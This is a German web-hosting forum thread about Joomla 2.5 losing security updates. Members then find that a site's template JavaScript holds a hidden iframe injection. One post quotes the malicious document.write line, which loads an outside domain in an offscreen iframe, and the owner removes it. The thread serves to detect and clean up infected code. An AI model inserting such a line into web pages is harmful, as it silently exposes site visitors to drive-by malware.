kostenloser Webspace werbefrei: lima-city


Support für Joomla 2.5.x endet

lima-cityForumSonstigesSpam und sonstiges Unvergütetes

  1. Autor dieses Themas

    burgi

    Co-Admin Kostenloser Webspace von burgi

    burgi hat kostenlosen Webspace.

    Für alle, die Joomla nutzen:
    Für die Version 2.5 wird es bald keine Sicherheitsupdates mehr geben. Ein Upgrade auf 3.0 bleibt also über kurz oder lang nicht aus:
    auf heise.de weiterlesen
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. Kann aber ganz schön in Arbeit ausarten.
    Bei mir musste das Template neu, fast alle ThirdPartie Module und dann alles noch anpassen - also dann doch neu aufsetzen.
    Der Aufwand lohnt sich aber, den das 3er Framework ist schon einiges besser als die 2.5er Version und ein Neuaufbau vermeidet den ganzen Müll eines brachialen Upgrades.
    Mit einer zweiten "Hilfsdomain" kann man das ja auch ganz entspannt angehen und erst wenn alles fertig ist einfach die Verzeichnisse umschalten - klappt 1a!
  4. Mein Browser warnt mich vor dem Betreten von http://lenas-luftloch.de. Was machst du auf dieser Webseite??
  5. Was sagt er genau und was hat das mit diesem Thread zu tun?!
  6. muellerlukas schrieb:
    Was sagt er genau und was hat das mit diesem Thread zu tun?!


    Das wüste ich logischer Weise auch gerne.
    Bei uns in der Firma ist der Zugang schwer reglementiert und abgesichert und dennoch gibt es mit meiner Seite keine Probleme.
    Was wird denn genau angemahnt?
    Da sollte absolut nichts sonderbares ablaufen - wozu auch?

    Beitrag zuletzt geändert: 9.3.2015 0:03:02 von luftloch
  7. gaminghighend

    gaminghighend hat kostenlosen Webspace.

    luftloch schrieb:
    muellerlukas schrieb:
    Was sagt er genau und was hat das mit diesem Thread zu tun?!


    Das wüste ich logischer Weise auch gerne.
    Bei uns in der Firma ist der Zugang schwer reglementiert und abgesichert und dennoch gibt es mit meiner Seite keine Probleme.
    Was wird denn genau angemahnt?
    Da sollte absolut nichts sonderbares ablaufen - wozu auch?


    bei mir wir es auch angezeigt.
    Ich nutze Kaspersky als Antiviren Software.
    Hier mal ein Screenshot von dem was angezeigt wird, sobald man die Website betritt.
    http://gaminghighend.de/wp-content/uploads/2015/03/bandicam-2015-03-09-16-24-34-782.jpg
  8. Interessant.
    Das Script macht nichts anderes, als die linken und rechten Blöcke auf Wunsch nicht scrollen zu lassen, was aber derzeit deaktiviert ist.
    Würde ich mal als klares false positiv bezeichnen, mit dem die Hersteller der AV-Programme ihre Wichtigkeit demonstrieren.
    Allerdings verwende ich auch auf einigen Rechnern Kaspersky und da wird nicht gemault - sonderbar.
  9. luftloch schrieb:
    Interessant.
    Das Script macht nichts anderes, als die linken und rechten Blöcke auf Wunsch nicht scrollen zu lassen, was aber derzeit deaktiviert ist.

    Doch, macht es! Es baut noch einen versteckten iframe in die Seite ein:
    document.write('<iframe src="http://sandersam.kick-kt.com/fiflarudios16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>');


    Das ist sicher nicht zur Erfüllung des genannten Zweckes notwendig. :wink:
  10. Ja, das habe ich auch gerade mit erschrecken festgestellt.
    Zumal in der Funktion auch noch ein völlig überflüssiger Cookie gesetzt wird :-(
    In sofern erst einmal VIELEN DANK FÜR DEN HINWEIS !!!
    Schmeiße ich sofort raus!

    So, das kleine Biest ist auskommentiert und dennoch funktioniert die Sticky-Funktion noch einwandfrei.

    Beitrag zuletzt geändert: 9.3.2015 20:09:55 von luftloch
  11. luftloch schrieb:
    Schmeiße ich sofort raus!


    Dann solltest Du auch gleich noch in "/templates/sunshine/js/uikit/uikit.min.js" putzen. Da findet sich Ähnliches.^^
  12. Ja leck mich, ich bin von Sarotti - was ist das denn für eine Sch...!

    Wenn ich Euch nicht hätte ^^

    DANKE!

    P.S.: was mich beruhigt ist der Umstand, daß der Mist schon von vorn herein in den Scripten war, also nicht nachträglich eingeschleust wurden, und die aktuelle Version des Templates auch sauber ist.

    Beitrag zuletzt geändert: 9.3.2015 21:18:19 von luftloch
  13. Na dann war der (eigentlich off-topic)-Hinweis ja doch noch zu etwas nützlich ;-).
  14. stuffer schrieb:
    Na dann war der (eigentlich off-topic)-Hinweis ja doch noch zu etwas nützlich ;-).


    Auf jeden Fall!
    Egal ob per PM oder, wenn auch etwas OT, im Tröt - solche Hinweise sind auf jeden Fall wertvoll!
  15. ist das eigendlich bei wordpress auch so oder ist das ein rollingrelease ?
  16. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!